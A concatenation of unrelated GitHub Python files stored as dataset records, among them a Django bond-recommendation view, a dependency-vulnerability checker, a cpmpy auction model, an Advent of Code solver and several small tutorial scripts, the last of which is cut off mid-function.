render(request, 'home.html', context)\n\ndef results(request):\n\n context = dict()\n sec_id = str(request.GET['sec_id'])\n context['sec_id'] = sec_id\n context['sec_id_error'] = 0\n numofdays = int(request.GET.get('num_of_days', 30))\n numofrecomm = int(request.GET.get('num_of_recommendation', 10))\n cohort_filtering = str(request.GET.get('cohort_filtering', 'Yes'))\n ytm_upper = str(request.GET.get('ytm_upper', ''))\n ytm_lower = str(request.GET.get('ytm_lower', ''))\n oad_upper = str(request.GET.get('oad_upper', ''))\n oad_lower = str(request.GET.get('oad_lower', ''))\n\n try:\n ## COLUMNS WHOSE VALUES MUST BE THE SAME IN ORDER TO BE CONSIDERED SIMILAR\n if cohort_filtering == \"Yes\":\n cohort_attributes = ['BCLASS3', 'Ticker', 'Country', 'Class - Detail - Code']\n else:\n cohort_attributes = None\n\n ## COLUMNS THAT THE MODEL SHOULD CONSIDER WHEN LOOKING FOR SIMILAR BONDS\n features = [\"OAS\", \"OAD\", \"KRD 5Y\", \"KRD 10Y\", \"KRD 20Y\", \"KRD 30Y\"]\n\n ## COLUMNS TO DISPLAY IN THE CLI OUTPUT\n display_columns = ['ISIN', 'Ticker', 'BCLASS3', 'Country'] + (features or []) + ['Yield to Mat', 'Cpn', 'Px Close']\n #context['display_columns'] = display_columns\n\n bond = get_single_day_data().get_bond(sec_id)\n\n 
filter_conditions = {'Yield to Mat': (ytm_lower, ytm_upper), 'OAD': (oad_lower, oad_upper)}\n\n bond = bond.reset_index()\n bond_table = bond[display_columns]\n context['bond_table'] = bond_table.values.tolist()\n\n model_helper = get_bpr_model_helper()\n\n similar_bonds = model_helper.predict(sec_id)\n similar_bonds = model_helper.display(similar_bonds, display_cols=display_columns).reset_index()\n similar_bonds_table = similar_bonds.values.tolist()\n\n bond = get_multi_day_data(numdays=numofdays).get_bond(sec_id)\n context['bond_dates'] = '|'.join(bond[\"date\"].values)\n context['bond_OAS'] = '|'.join(list(map(str, bond[\"OAS\"].values)))\n\n bond_dates2 = list()\n bond_OAS2 = list()\n\n for l in similar_bonds_table:\n sec_code = str(l[1])\n bond = get_multi_day_data(numdays=numofdays).get_bond(sec_code)\n bond_dates2.append([sec_code, '|'.join(bond[\"date\"].values)])\n bond_OAS2.append([sec_code, '|'.join(list(map(str, bond[\"OAS\"].values)))])\n\n context['bond_dates2'] = bond_dates2\n context['bond_OAS2'] = bond_OAS2\n\n # Integration with JPM rich/cheap\n isins = similar_bonds.ISIN.unique()\n prediction_result = pd.concat([predict_single_rc(date=None, isin=isin) for isin in isins])\n result = similar_bonds.merge(prediction_result, on=\"ISIN\", how =\"outer\")\n display_columns = display_columns + [\"rich/cheap\"]\n result_table = result[display_columns].values.tolist()\n context[\"similar_bonds_table\"] = result_table\n context['display_columns'] = display_columns\n\n return render(request, 'results.html', context)\n\n except KeyError as e:\n import traceback\n print(traceback.print_exc())\n context['sec_id_error'] = 1\n return render(request, 'home.html', context)\n\n\ndef feedback(request):\n \"\"\"\n Update the model with feedback from the user, and refresh the predictions\n :param request: The RequestContext, expected to have three attributes of the GET request\n bond: The ISIN of the bond we are finding bonds similar to\n better: The ISIN of a bond that is a better recommendation than its current rank\n worse: The ISIN of a bond that is a worse recommendation than its current rank\n \"\"\"\n\n bond = request.GET['bond']\n better = request.GET['better']\n worse = request.GET['worse']\n\n feedback = [(bond, better, worse)]\n get_bpr_model_helper().process_feedback(feedback)\n # TODO add support for persisting the feedback and/or the model\n # model_helper.save('models/bpr_v3.pt')\n\n base_url = reverse('results')\n query_string = urlencode({'sec_id': bond})\n url = \"{}?{}\".format(base_url, query_string)\n\n return redirect(url)\n\n\ndef get_similar_bonds(isin, single_day_data, num_of_bonds, filter_conditions, features=None, cohort_attributes=None):\n \"\"\"\n This is a top-level function that is meant to be called when processing a server requst for SimilarBonds\n\n :param isin: The ISIN identifier of the bond we're trying to find similar bonds for\n :param features: Optional. A list of columns to consider when determining bond similarity.\n Default: None, meaning all columns in the data set\n :param cohort_attributes: Optional. 
A list of columns specifying the bond attributes that *must* be the same in order for a bond to be considered similar\n Default: None, meaning all bonds are valid candidates\n \"\"\"\n\n # ISIN to Pandas Series of data for that bond\n bond = get_single_day_data().get_bond(isin)\n\n # Pandas Series to Pandas DataFrame of data for all bonds in the specified cohort\n if cohort_attributes is None:\n cohort_attributes = []\n bond_cohort = get_single_day_data().data\n else:\n bond_cohort = get_single_day_data().get_cohort(bond, attributes=cohort_attributes)\n\n ytm_lower = filter_conditions['Yield to Mat'][0]\n ytm_upper = filter_conditions['Yield to Mat'][1]\n oad_lower = filter_conditions['OAD'][0]\n oad_upper = filter_conditions['OAD'][1]\n\n # Filter by ytm range\n if (ytm_upper != '') and (ytm_lower != ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'].between(float(ytm_lower), float(ytm_upper), inclusive=True)]\n elif (ytm_upper != '') and (ytm_lower == ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'] < float(ytm_upper)]\n elif (ytm_upper == '') and (ytm_lower != ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'] > float(ytm_lower)]\n else:\n pass\n\n # Filter by oad range\n if (oad_upper != '') and (oad_lower != ''):\n bond_cohort = bond_cohort[bond_cohort['OAD'].between(float(oad_lower), float(oad_upper), inclusive=True)]\n elif (oad_upper != '') and (oad_lower == ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'] < float(oad_upper)]\n elif (oad_upper == '') and (oad_lower != ''):\n bond_cohort = bond_cohort[bond_cohort['Yield to Mat'] > float(oad_lower)]\n else:\n pass\n\n if features is None:\n features = [col for col in bond_cohort.columns if col not in cohort_attributes]\n\n # Fit the model\n model = similar_bonds_pipeline()\n model.fit(bond_cohort[features])\n\n # Find similar bonds\n k_neighbors = min(bond_cohort.shape[0], num_of_bonds)\n distances, indices = model.predict(bond[features], k_neighbors=k_neighbors)\n similar_bond_isins = bond_cohort.iloc[indices.ravel()].index.values\n # Exclude the input isin from the list of similar bonds\n similar_bond_isins = [i for i in similar_bond_isins if i != isin]\n\n similar_bonds = get_single_day_data().get_bonds(similar_bond_isins)\n\n return similar_bonds\n","repo_name":"naotominakawa/Capstone","sub_path":"UI/BondRecommender/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"8382986758","text":"\"\"\"\n============================\nAuthor:柠檬班-木森\nTime:2020/7/25 11:08\nE-mail:3247119728@qq.com\nCompany:湖南零檬信息技术有限公司\n============================\n\"\"\"\n\"\"\"\n# 动态设置属性\nsetattr(obj,属性名,属性值):在代码执行的过程中给 类/对象 设置属性(属性不存在就是添加,存在就是修改)\n\ngetattr(obj,属性名,默认值):在代码执行的过程中获取 类/对象 属性\n\ndelattr(obj,属性名) :在代码执行的过程中删除 类/对象 属性\n\n\n__dict__:获取所有的属性\n\"\"\"\n\n\nclass BaseClass(object):\n\n def __init__(self, name, sex, age):\n self.name = name\n self.sex = sex\n self.age = age\n\n\n# 动态设置类属性\n# BaseClass.attr = 18\n# BaseClass.attr2 = \"木森\"\n# setattr(BaseClass,\"attr\",18)\n\n# 如何将变量的值设置为类属性名?\n# var = input(\"请输入属性名:\")\n# value = 8890\n# setattr(BaseClass,var,value)\n# 可以查看所有的属性\n# print(BaseClass.__dict__)\n# b1 = BaseClass(\"木木\", \"男\")\n# ------------------设置属性----------------\n# # 给对象设置属性\n# setattr(b1, \"age\", 999)\n# print(b1.__dict__)\n\n# ------------------访问属性----------------\n# b1 = BaseClass(\"木木\", \"男\")\n# # 需求:根据用户的输入的属性名,获取对应的属性值\n# item = 
input(\"请输入属性名:\")\n# res = getattr(b1, item,None)\n# print(res)\n\n# ——-------------属性删除-----------\nb1 = BaseClass(\"木木\", \"男\",18)\n# 需求:根据用户的输入的属性名,删除对应的属性值\nitem = input(\"请输入属性名:\")\ndelattr(b1, item)\nprint(b1.__dict__)\n\n\n# b1 = BaseClass(\"木木\", \"男\", 18)\n# b1.aa = 11\n# b1.bb = 99\n# print(b1.__dict__)\n\n\n# # 需求:打印name之外的所有属性\n# keys = b1.__dict__.keys()\n# for key in keys:\n# if key != \"name\":\n# print(getattr(b1, key))\n#\n# print(b1.__dict__)\n","repo_name":"guoyunfei0603/py31","sub_path":"day12继承/day12_teacher/demo7_属性动态设置.py","file_name":"demo7_属性动态设置.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"72310393913","text":"import os\nimport json\nfrom tqdm import tqdm\n\ndef make_emoji(file_name: str, text: str):\n os.system(\n \"convert -pointsize 140\" +\n \" -font /usr/share/fonts/TTF/mplus-1c-black.ttf\" +\n \" -annotate 0 \" + str(text) +\n \" -gravity center -fill black -size 128x128 xc:none\" +\n \" out/\" + str(file_name) + \".png\"\n )\n\nif __name__ == '__main__':\n os.system(\"mkdir out\")\n with open(\"json/alpha.json\", \"r\") as file:\n alpha_list = json.load(file)\n for char in tqdm(alpha_list):\n make_emoji('zzz_'+char, char)\n\n with open(\"json/hiragana.json\", \"r\") as file:\n kana_list = json.load(file)\n for char in tqdm(kana_list):\n make_emoji(char, char)\n\n with open(\"json/jis1.json\", \"r\") as file:\n kanji_list = json.load(file)\n for char in tqdm(kanji_list):\n make_emoji(char, char)\n\n with open(\"json/katakana.json\", \"r\") as file:\n katakana_list = json.load(file)\n for char in tqdm(katakana_list):\n make_emoji(char, char)\n\n","repo_name":"eliza0x/emoji_maker","sub_path":"emoji.py","file_name":"emoji.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"33464718922","text":"#!/usr/bin/python3\n#\n# dep-vuln-checker.py - check project dependencies for known vulnerabilities\n#\n\nimport sys\nimport subprocess\nimport os.path\nfrom os import environ\nimport requests_cache\nimport datetime\nimport argparse\nimport redis\nimport LogHandler\nimport NvdRepository\nimport GhsaRepository\nimport InventoryRepository\nfrom CodeDir import CodeDir\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(description='Check project dependencies for known vulnerabilities')\n\n parser.add_argument('-g', dest=\"gh_apikey_file\", type=str,\n help=\"GitHub apikey location (default: /etc/dep-vuln-checker/gh-apikey)\",\n default=\"/etc/dep-vuln-checker/gh-apikey\")\n parser.add_argument('-n', dest=\"nvd_apikey_file\", type=str,\n help=\"NVD apikey location (default: /etc/dep-vuln-checker/nvd-apikey)\",\n default=\"/etc/dep-vuln-checker/nvd-apikey\")\n parser.add_argument('-a', dest=\"applog\", type=str,\n help=\"app log location or \\\"none\\\" (default: /var/log/dep-vuln-checker/app.log)\",\n default=\"/var/log/dep-vuln-checker/app.log\")\n parser.add_argument('-l', dest=\"vulnlog\", type=str,\n help=\"vulnerability log location (default: /var/log/dep-vuln-checker/vulns.log)\",\n default=\"/var/log/dep-vuln-checker/vulns.log\")\n parser.add_argument('-i', dest=\"invpath\", type=str,\n help=\"Inventory database location or \\\"none\\\" (default: /var/lib/dep-vuln-checker/inventory.db)\",\n default=\"/var/lib/dep-vuln-checker/inventory.db\")\n parser.add_argument('-c', dest=\"reqcachetype\", type=str,\n help=\"request cache type. 
Allowed values: redis, sqlite (no request cache used if omitted)\",\n default=None)\n parser.add_argument('-cp', dest=\"reqcachepath\", type=str,\n help=\"reqest cache database path when using sqlite cache type (default: /var/lib/dep-vuln-checker/reqcache.db\",\n default=\"/var/lib/dep-vuln-checker/reqcache.db\")\n parser.add_argument('-rh', dest=\"redishost\", type=str,\n help=\"redis host for request cache and/or severity cache (default: 127.0.0.1)\",\n default=\"127.0.0.1\")\n parser.add_argument('-rp', dest=\"redisport\", type=int,\n help=\"redis port for request cache and/or severity cache (default: 6379)\",\n default=6379)\n parser.add_argument('-rP', dest=\"redispass\", type=str,\n help=\"redis password for request cache and/or severity cache (no password used if omitted)\",\n default=None)\n parser.add_argument('-r', dest=\"ghsarepopath\", type=str,\n help=\"directory to clone GitHub Advisory Database to\",\n default=\"/var/lib/dep-vuln-checker/ghsa\")\n parser.add_argument(\"-s\", action=\"store_true\",\n help=\"silent mode - no output\")\n parser.add_argument(\"-t\", dest=\"nvd_download_tmpdir\", type=str,\n help=\"temp directory to download NVD JSON files (default: /tmp)\",\n default=\"/tmp\")\n parser.add_argument(\"-I\", action=\"store_true\",\n help=\"initialize local NVD + GHSA cache and exit\")\n parser.add_argument('dirlist', nargs='?' if '-I' in sys.argv else '+',\n help=\"location of newline separated file which contains the project dir paths to check OR a single path if only one project needs to be checked\")\n\n return parser.parse_args()\n\n\ndef check_deps(lh: LogHandler):\n try:\n res = subprocess.run([\"local-php-security-checker\", \"-help\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n if res.returncode != 0:\n raise Exception()\n except Exception as e:\n lh.log_msg(\"local-php-security-checker not available: \" + str(e), \"ERROR\")\n sys.exit(1)\n\n try:\n res = subprocess.run([\"npm\", \"audit\", \"-h\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n if res.returncode != 0:\n raise Exception()\n except Exception as e:\n lh.log_msg(\"npm audit not available: \" + str(e), \"ERROR\")\n sys.exit(1)\n\n try:\n res = subprocess.run([\"pnpm\", \"audit\", \"-h\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n if res.returncode != 0:\n raise Exception()\n except Exception as e:\n lh.log_msg(\"pnpm audit not available: \" + str(e), \"ERROR\")\n sys.exit(1)\n\n try:\n res = subprocess.run([\"yarn\", \"-v\"],\n stdout=subprocess.DEVNULL,\n stderr=subprocess.DEVNULL)\n if res.returncode != 0:\n raise Exception()\n except Exception as e:\n lh.log_msg(\"yarn not available: \" + str(e), \"ERROR\")\n sys.exit(1)\n\n\ndef read_repolist(path: str, lh: LogHandler):\n repolist = []\n try:\n with open(path, 'r') as fh:\n repolist = filter(None, fh.read().split('\\n'))\n except Exception as e:\n lh.log_msg(\"Unable to read repolist: \" + str(e), \"ERROR\")\n sys.exit(1)\n return repolist\n\n\ndef read_apikey(envvarname: str, file: str, lh: LogHandler):\n # env takes precedence over file\n apikeyfromenv = environ.get(envvarname)\n if apikeyfromenv is not None:\n return apikeyfromenv\n\n try:\n with open(file, 'r') as fh:\n return fh.read().rstrip('\\n')\n except Exception:\n lh.log_msg(\"Unable to read apikey from \" + file, \"ERROR\")\n sys.exit(1)\n\n\ndef patch_req_cache_redis(redis_host, redis_port):\n redisbackend = requests_cache.backends.RedisCache(host=redis_host, port=redis_port)\n requests_cache.install_cache('globalcache', 
backend=redisbackend, expire_after=datetime.timedelta(days=7))\n\n\ndef patch_req_cache_sqlite(reqcachepath):\n sqlitebackend = requests_cache.backends.SQLiteCache(db_path=reqcachepath)\n requests_cache.install_cache('globalcache', backend=sqlitebackend, expire_after=datetime.timedelta(days=7))\n\n\ndef main():\n args = parse_args()\n print(args.dirlist)\n\n lh = LogHandler.LogHandler(args.applog, args.s)\n\n redishostfromenv = environ.get('REDIS_HOST')\n redisportfromenv = environ.get('REDIS_PORT')\n redispassfromenv = environ.get('REDIS_PASS')\n redishost = args.redishost if redishostfromenv is None else redishostfromenv\n redisport = args.redisport if redisportfromenv is None else redisportfromenv\n redispass = args.redispass if redispassfromenv is None else redispassfromenv\n try:\n if redispass is not None:\n rediscon = redis.Redis(host=redishost, port=redisport, password=redispass)\n else:\n rediscon = redis.Redis(host=redishost, port=redisport)\n rediscon.ping()\n except Exception as e:\n lh.log_msg(\"Failed to connect to redis at {}:{}: {}\".format(redishost, redisport, str(e)), \"ERROR\")\n sys.exit(1)\n lh.log_msg(\"Connected to redis at {}:{}\".format(redishost, redisport), \"INFO\")\n\n nvdrepo = NvdRepository.NvdRepository(read_apikey(\"NVD_APIKEY\", args.nvd_apikey_file, lh), rediscon, lh)\n ghsarepo = GhsaRepository.GhsaRepository(read_apikey(\"GH_APIKEY\", args.gh_apikey_file, lh), rediscon, lh)\n\n check_deps(lh)\n\n if args.invpath != \"none\":\n inventoryrepo = InventoryRepository.InventoryRepository(args.invpath, lh)\n else:\n inventoryrepo = None\n\n if args.reqcachetype == \"redis\":\n patch_req_cache_redis(args.redishost, args.redisport)\n if args.reqcachetype == \"sqlite\":\n patch_req_cache_sqlite(args.reqcachepath)\n\n if args.I:\n lh.log_msg(\"-I given, creating local databases from scratch\", \"INFO\")\n nvdrepo.first_run()\n ghsarepo.download_ghsa_data(args.ghsarepopath)\n ghsarepo.load_ghsa_data(args.ghsarepopath)\n sys.exit(0)\n\n for i in args.dirlist:\n if os.path.isdir(i):\n directory = CodeDir(i, lh)\n directory.set_checkers(nvdrepo, ghsarepo, inventoryrepo)\n directory.run_checkers()\n directory.write_vulns_json(args.vulnlog)\n elif os.path.isfile(i):\n for j in read_repolist(i, lh):\n directory = CodeDir(j, lh)\n directory.set_checkers(nvdrepo, ghsarepo, inventoryrepo)\n directory.run_checkers()\n directory.write_vulns_json(args.vulnlog)\n else:\n lh.log_msg(\"repolist argument is not a dir or file, skipping {}\".format(i), \"WARN\")\n\n lh.log_msg(\"Done\", \"INFO\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ptrsimon/dep-vuln-checker","sub_path":"src/dep-vuln-checker.py","file_name":"dep-vuln-checker.py","file_ext":"py","file_size_in_byte":8849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"41124773606","text":"inFp, outFp = None, None \ninStr = \"\"\n\ninFp = open(\"./test.jpg\", \"rb\")\noutFp = open(\"./testCopied.jpg\", \"wb\")\n\nwhile True :\n inStr = inFp.read(1)\n if not inStr :\n break\n outFp.write(inStr)\n\ninFp.close()\noutFp.close()\nprint(\"image file copied.\")\n","repo_name":"yeolkyu/Python_Network_Programming","sub_path":"08장/binaryCopy.py","file_name":"binaryCopy.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"18932782149","text":"from keras.models import load_model\nimport evaluate_data\nimport numpy as np\n\nmodel = load_model('model.h5')\n\neX = 
evaluate_data.eX\neY = evaluate_data.eY\n\n#学習結果の確認\nret = model.predict_classes(eX)\n\ncollectCount = 0\n# ラベル毎の正解の保存\ncollects = [[0, 0],[0, 0],[0, 0], [0, 0]]\nfor idx, val in enumerate(ret):\n print(\"予測:{0},実際{1},{2}\".format(val, eY[idx], val == eY[idx]))\n collectCount = collectCount + (1 if val == eY[idx] else 0)\n collects[eY[idx]][0] = collects[eY[idx]][0] + 1\n if val == eY[idx]:\n collects[eY[idx]][1] = collects[eY[idx]][1] + 1\n \n\n\nprint(\"正解率{0}% (検証日数 {1}日)\".format(collectCount/len(ret)*100, len(ret)))\nprint(\"雨の正解率 = {0}%\\n晴れの正解率 = {1}%\\n曇の正解率 = {2}%\\n雪の正解率 = {3}%\".format(\n collects[0][1] / collects[0][0] * 100 if collects[0][0] > 0 else 0,\n collects[1][1] / collects[1][0] * 100 if collects[1][0] > 0 else 0,\n collects[2][1] / collects[2][0] * 100 if collects[2][0] > 0 else 0,\n collects[3][1] / collects[3][0] * 100 if collects[3][0] > 0 else 0\n))\n","repo_name":"Synashida/keras_first","sub_path":"load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"42693616706","text":"import sys\nfrom sys import stdin\nN, mod = 10**6,10**9+7\nc = [0]*(N+1)\nc[0] = c[1] = 1\nfor i in range(4,N+1,2):\n\tc[i] = 1\nfor i in range(3,N+1,2):\n\tif c[i]==0:\n\t\tfor j in range(i*i,N+1,2*i):\n\t\t\tc[j] = 1\ndel N\ndef pw(x,y):\n\tres = 1\n\twhile y!=0:\n\t\tif y%2==1:\n\t\t\tres = (res*x)%mod\n\t\ty//=2\n\t\tx = (x*x)%mod\n\treturn res\ndef mu(x,n):\n\tdem,i = 0,x\n\twhile i<=n:\n\t\tdem+=n//i\n\t\ti*=x\n\treturn dem\nfor _ in range(int(stdin.readline())):\n\ta,b = map(int,stdin.readline().split())\n\tans = 1\n\tdem = 0\n\tfor i in range(2,b//2+1):\n\t\tif c[i]==0:\n\t\t\tans = (ans*((mu(i,b)-mu(i,a-1))*2+1))%mod\n\tfor i in range(b//2+1,b+1):\n\t\tif c[i]==0:\n\t\t\tdem+=1\n\tans = (ans*pw(3,dem))%mod\n\tprint(ans)","repo_name":"Hiepnt03/Python_codePtit","sub_path":"PY02060.py","file_name":"PY02060.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"5594123934","text":"\"\"\"\nCombinatorial auction in cpmpy.\n\nThis is a more general model for the combinatorial example\nfrom the Numberjack Tutorial, pages 9 and 24 (slides 19/175 and 51/175).\n\nThe original and more talkative model is combinatorial_auction.py\n\nModel created by Hakan Kjellerstrand, hakank@hakank.com\nSee also my cpmpy page: http://www.hakank.org/cpmpy/\n\n\"\"\"\nfrom cpmpy import *\nfrom cpmpy.solvers import *\nimport numpy as np\nfrom instances.cpmpy_hakank import *\nfrom collections import defaultdict\n\n\ndef combinatorial_auction():\n\n n = 5 # number of bids\n bid_amount = [10,20,30,40,14]\n # the items for each bid\n items = [\n [0,1], # A,B\n [0,2], # A, C\n [1,3], # B,D\n [1,2,3], # B,C,D\n [0] # A\n ]\n \n x = intvar(0,1,shape=n, name=\"x\")\n\n # collect the bids for each item\n items_t = defaultdict(list)\n [items_t[j].append(i) for i in range(n) for j in items[i] ]\n \n\n obj = intvar(0,100,name='obj') \n model = Model([\n obj == sum(x*bid_amount),\n [ [sum( [x[bid] for bid in items_t[item]] ) <= 1] for item in items_t]\n ],\n maximize=obj,\n )\n\n return model\n\ndef get_model(seed=0):\n return 
combinatorial_auction()\n\n","repo_name":"JoD/explain-benchmarks","sub_path":"hakank/instances/combinatorial_auction2.py","file_name":"combinatorial_auction2.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"917518530","text":"import argparse\nimport numpy as np\n \ndef receive_input():\n\tparser = argparse.ArgumentParser()\n\tparser.add_argument(\"--input\", help=\"path for input file\", type=str, required=True)\n\targs = parser.parse_args()\n\treturn args\n\ndef read_file(args):\n\tfile = open(args.input, 'r')\n\treturn file.readlines()\n\ndef process_file(file):\n\tintersections = {}\n\tcarts = find_carts(file)\n\n\twhile(True):\n\t\tv = is_intersecting(carts)\n\t\tif(v != False):\n\t\t\treturn v[::-1]\n\t\tmove_carts(file, carts)\n\ndef is_intersecting(carts):\n\tfor i in range(len(carts)):\n\t\tfor j in range(i+1, len(carts)):\n\t\t\tpos1 = carts[i][0:2]\n\t\t\tpos2 = carts[j][0:2]\n\t\t\tif(pos1 == pos2):\n\t\t\t\treturn pos1\n\treturn False\n\ndef find_carts(field):\n\t# y,x,orientation,rotate\n\tcarts = []\n\tsymbols = {'>': 1, '<': -1, '^': 1j, 'v': -1j}\n\tfor y in range(len(field)):\n\t\tfor x in range(len(field[0])):\n\t\t\telem = field[y][x]\n\t\t\tif(elem in symbols.keys()):\n\t\t\t\tcarts.append([y, x, symbols[elem], 0])\n\treturn carts\n\ndef move_carts(field, carts):\n\tfor c in carts:\n\n\t\torient = c[2]\n\t\tif(orient == -1):\n\t\t\tc[1] -= 1\n\t\telif(orient == 1):\n\t\t\tc[1] += 1\n\t\telif(orient == 1j):\n\t\t\tc[0] -= 1\n\t\telif(orient == -1j):\n\t\t\tc[0] += 1\n\n\t\tpos = field[c[0]][c[1]]\n\t\tif(pos == '\\\\'):\n\t\t\tif(c[2].real == 0):\n\t\t\t\tc[2] *= 1j\n\t\t\telse:\n\t\t\t\tc[2] *= -1j\n\t\t\t\n\t\telif(pos == '/'):\n\t\t\tif(c[2].real == 0):\n\t\t\t\tc[2] *= -1j\n\t\t\telse:\n\t\t\t\tc[2] *= 1j\n\t\telif(pos == '+'):\n\t\t\tc[2] = c[2] * ((1j) * (-1j) ** c[3])\n\t\t\tc[3] = (c[3] + 1) % 3\n\t\t\n\t\t\ndef main():\n\targs = receive_input()\n\tfile = read_file(args)\n\tprint(process_file(file))\nmain()","repo_name":"j-godinho/advent-of-code-2018","sub_path":"13/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":1531,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"15368962487","text":"\"\"\"\n\n\"\"\"\n\n# PyQt Imports\nfrom PyQt5.Qt import (QStandardItemModel, QStandardItem)\n\n# Figshare Desktop Imports\nfrom Figshare_desktop.custom_widgets.extended_combo import ExtendedCombo\n\n__author__ = \"Tobias Gill\"\n__credits__ = [\"Tobias Gill\", \"Adrian-Tudor Panescu\", \"Miriam Keshani\"]\n__license__ = \"\"\n__version__ = \"0.0.1\"\n__maintainer__ = \"Tobias Gill\"\n__email__ = \"toby.gill.09@ucl.ac.uk\"\n__status__ = \"Development\"\n\n\nclass CategoriesCombo(ExtendedCombo):\n \"\"\"\n A QComboBox widget specifically designed to work with Figshare categories.\n \"\"\"\n\n def __init__(self, id_dict: dict, name_dict: dict, parent=None):\n \"\"\"\n Supers QComboBox, but also creates class references to the categories dictionaries.\n\n Args:\n id_dict: Categories dictionary with id numbers as keys.\n name_dict: Categories dictionary with names as keys.\n parent: Widget parent.\n \"\"\"\n super().__init__()\n self.id_dict = id_dict\n self.name_dict = name_dict\n cat_list = sorted(list(self.name_dict.keys()))\n self.fill_combo(cat_list)\n\n model = QStandardItemModel()\n for i, word in enumerate(cat_list):\n item = QStandardItem(word)\n model.setItem(i, 0, item)\n\n 
self.setModel(model)\n self.setModelColumn(0)\n\n if parent is not None:\n self.setParent(parent)\n\n def fill_combo(self, fill_list: list):\n \"\"\"\n Fills the combo box with categories from the fill list.\n\n Args:\n fill_list: list of strings to put as items in the combo box.\n\n Returns:\n\n \"\"\"\n self.clear()\n self.addItem('')\n self.addItems(fill_list)\n\n","repo_name":"tobias-gill/Figshare_desktop","sub_path":"custom_widgets/categories_combo.py","file_name":"categories_combo.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"14066378331","text":"import sys\r\n\r\nBUFFER_LENGTH = 12\r\n\r\ndef get_user_numbers(message):\r\n valid = False\r\n converted_number = 0\r\n while not valid:\r\n input_text = input(message)\r\n \r\n try:\r\n converted_number = int(input_text)\r\n if converted_number > sys.maxsize or converted_number < -sys.maxsize:\r\n print(\"Number too big bozo\")\r\n else:\r\n valid = True\r\n except ValueError:\r\n print(\"Enter an actual number bozo\")\r\n\r\n return converted_number\r\n\r\ndef insert_numbers(array_of_nums, total_inputs):\r\n how_many_more = total_inputs\r\n for a in range(total_inputs):\r\n print(f\"Enter a number for index {a} ({how_many_more} positions left)\")\r\n array_of_nums[a] = get_user_numbers(\"Enter the number for the index\\n-> \")\r\n print()\r\n\r\ndef is_sorted(array):\r\n return True\r\n\r\nif __name__ == \"__main__\":\r\n num_ints = 0\r\n while num_ints <= 0:\r\n num_ints = get_user_numbers(\"How many integers do you want\\n-> \")\r\n if num_ints <= 0:\r\n print(\"Number has to be greater than zero bozo\")\r\n\r\n print(num_ints)\r\n\r\n needs_to_be_sorted = [0] * num_ints\r\n insert_numbers(needs_to_be_sorted, num_ints)\r\n\r\n for p in range(num_ints):\r\n print(f\"index {p} is {needs_to_be_sorted[p]}\")\r\n\r\n if is_sorted(needs_to_be_sorted):\r\n print(\"This is sorted\")\r\n else:\r\n print(\"Still sorted he he\")\r\n","repo_name":"phishfish/Gaslight-Sort","sub_path":"Python/Gaslight-Sort.py","file_name":"Gaslight-Sort.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"8544375923","text":"#!/usr/local/bin/python3\nimport sys\n\nif sys.argv[1] == \"--size\":\n size = int(sys.argv[2])\nelse:\n try:\n size=int(input('Square size:'))\n except ValueError:\n print (\"Not a number\")\n\ndef max_base10_size(max_n):\n return len(str(max_n))\n\nsquared_size = size*size\n\ndef print_list(list):\n print_string = \"\"\n for i in list:\n print_string += ' ' + str(i).rjust(max_base10_size(squared_size), '0')\n if i%size == 0:\n print_string += \"\\n\"\n return print(print_string)\n\ndef print_array(arr):\n length = max_base10_size(squared_size)\n for line in arr:\n print_string = \"\"\n for item in line:\n print_string += \" \"\n if item is None:\n print_string += \"-\" * length\n else:\n print_string += str(item).rjust(max_base10_size(squared_size), '0')\n print(print_string)\n\n\ndef inline(size):\n inline_list = [x+1 for x in range(squared_size)]\n print_list(inline_list)\n\ndef vertical(size):\n numbers = [[None for i in range(size)] for j in range(size)]\n current = 1\n for i in range(size):\n for j in range(size):\n numbers[j][i] = current\n current+=1\n print_array(numbers)\n\n\n\ndef spiral(size):\n numbers = [[None for i in range(size)] for j in range(size)]\n current = squared_size\n i = 0\n j = size-1\n di = 0\n dj = -1\n\n 
